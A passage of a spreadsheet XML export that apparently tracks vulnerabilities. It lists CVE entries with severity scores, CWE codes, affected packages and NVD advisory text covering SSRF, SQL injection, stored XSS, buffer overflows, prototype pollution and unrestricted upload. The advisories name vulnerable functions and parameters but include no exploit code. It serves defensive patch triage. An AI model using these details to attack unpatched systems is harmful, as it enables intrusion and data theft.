          <t>In multi-node deployments, an attacker who had already obtained code execution on one appliance node could submit a value through an internal cluster interface that was written into monitoring configuration on another node without sufficient validation, potentially allowing OS commands to be executed there. Execution was limited to an unprivileged service account on that node.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102136</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102983</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/netlify</t>
        </is>
      </c>
      <c r="M438" s="5" t="inlineStr">
        <is>
          <t>8.2.4</t>
        </is>
      </c>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-918</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 5.2.0 until 8.2.4, the @astrojs/netlify adapter generates regular expressions for Netlify Image CDN remote-image allowlists without anchoring them to the beginning of the URL. Because Netlify evaluates these expressions with RegExp.test(), an allowed origin appearing only in a source URL's path or query can satisfy image.domains or image.remotePatterns while the URL's actual host remains attacker-controlled. An unauthenticated request to the public /.netlify/images endpoint can therefore cause the Image CDN to request attacker-selected URLs and may probe or reach internal services. Netlify egress protections may constrain reachable targets, and image transformation limits direct response exfiltration; no confidentiality or integrity impact has been demonstrated. This issue is fixed in version 8.2.4.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102983</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103115</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in OS4ED openSIS-Classic up to 9.3. This affects an unknown function of the file functions/CustomFieldsFnc.php of the component Student Search. The manipulation of the argument cust results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103115</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103222</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Blosc C-Blosc2 up to 3.3.2. This impacts the function blosclz_decompress of the file blosc/blosclz.c of the component blosclz Decompression. Executing a manipulation can lead to integer overflow. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. Upgrading to version 3.3.3 will fix this issue. This patch is called fe2964d114d97847f56570a0ab2be2c57ccbeedc. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103222</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103226</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Artifex Ghostscript up to 10.09.0. Affected is the function type1_callsubr of the file devices/vector/gdevpsfx.c of the component Pdfwrite. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. It is suggested to install a patch to address this issue. A solution was implemented: "I've chosen to fix this slightly differently by using the defined macro in the font parsing loop rather than in the callsubr function, because this better matches the pattern of 'normal' usage."</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103226</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103227</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in GPAC up to 26.07.0. Affected by this issue is the function gf_dash_resolve_url of the file src/media_tools/dash_client.c of the component DASH Client. This manipulation causes buffer overflow. The attack is possible to be carried out remotely. Upgrading to version abi-16.26 can resolve this issue. Patch name: 4c8e26f278ff63eec57968f7bc696f604bb0cffd. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103227</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103534</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in David-Crty databasement up to 1.7.1. Affected is the function SnapshotPolicy.viewAny/SnapshotPolicy.view of the file /api/v1/snapshots of the component Snapshot Model. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.7.2 is able to address this issue. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103534</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103540</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in formtools.org Form Tools up to 3.1.1. This vulnerability affects the function Clients::updateClientSettingsTab of the file global/code/Clients.class.php of the component Client Settings. The manipulation of the argument page_titles leads to improper neutralization of special elements used in a template engine. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103540</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103541</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in formtools.org Form Tools up to 3.1.1. This issue affects the function Files::uploadFile of the file global/code/actions.php of the component Ajax Handler. The manipulation results in unrestricted upload. It is possible to launch the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103541</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103543</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Leave Management System 1.0. The affected element is an unknown function of the file /module/leavetype/controller.php. Such manipulation of the argument LEAVTID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103543</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91860</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>npm, maven, gin</t>
        </is>
      </c>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>A prototype pollution vulnerability exists in the deep merge helpers of Vaadin Charts and Vaadin Component Base. Merging an object the application does not control into a chart configuration or into a component's i18n property writes onto Object.prototype, making the injected properties visible to every object in the running application.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.0.0 - 23.6.13
Vaadin 24.0.0 - 24.9.20
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.21
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-core 24.7.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-core 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-core 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-core 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-charts-flow 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-charts-flow 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-charts-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-charts-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-charts-flow 25.2.0 - 25.2.6 &gt;=25.2.7
npm packages
npm package Vulnerable versions Fixed version
@vaadin/charts 23.0.0 - 23.6.4 &gt;=23.6.5
@vaadin/charts 24.0.0 - 24.9.17 &gt;=24.9.18
@vaadin/charts 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/charts 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/charts 25.2.0 - 25.2.8 &gt;=25.2.9
@vaadin/component-base 24.7.0 - 24.9.17 &gt;=24.9.18
@vaadin/component-base 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/component-base 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/component-base 25.2.0 - 25.2.8 &gt;=25.2.9</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91860</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96821</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in FluentBoards &lt;= 2.0.12 versions.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96821</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103388</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>MISP renders the source field of a Galaxy Cluster as a clickable hyperlink whenever the stored value passes PHP's FILTER_VALIDATE_URL validation. Because FILTER_VALIDATE_URL accepts the javascript: URI scheme, a user with galaxy editor privileges on the local instance or on a synced instance could store a javascript: URL as the cluster source.
When another user views the affected Galaxy Cluster and clicks the rendered link, the embedded script executes in the victim's browser context, enabling session hijacking, data exfiltration, or actions performed on behalf of the victim.
Preconditions:
- Attacker must hold galaxy editor privileges (local or via sync).
- Victim must view the affected cluster and click the malicious link.
Impact:
- Stored cross-site scripting (XSS) in the victim's browser.
- Potential session theft, credential harvesting, or unauthorized actions within the MISP application.
Affected: &lt;2.5.48.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103388</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103389</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site scripting (XSS) vulnerability in the galaxy icon handling path. The icon field of a galaxy object was persisted without any server-side validation through the galaxy add, edit, and sync/import capture endpoints. The stored value was subsequently concatenated directly into HTML markup by the D3-based correlation graph rendering scripts (both the default and Overmind themes) using the .html() method.
A user holding the perm_galaxy_editor permission, which is granted to the stock User role, could store arbitrary HTML or JavaScript in the icon field. Any other user who opened the correlation graph of an event containing a cluster belonging to that galaxy would have the injected script executed in their browser session.
Impact:
- Arbitrary script execution in the context of the victim's MISP session
- Potential theft of session credentials, manipulation of displayed data, or initiation of actions on behalf of the victim
- Affects both the default and Overmind UI themes
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103389</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47096</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
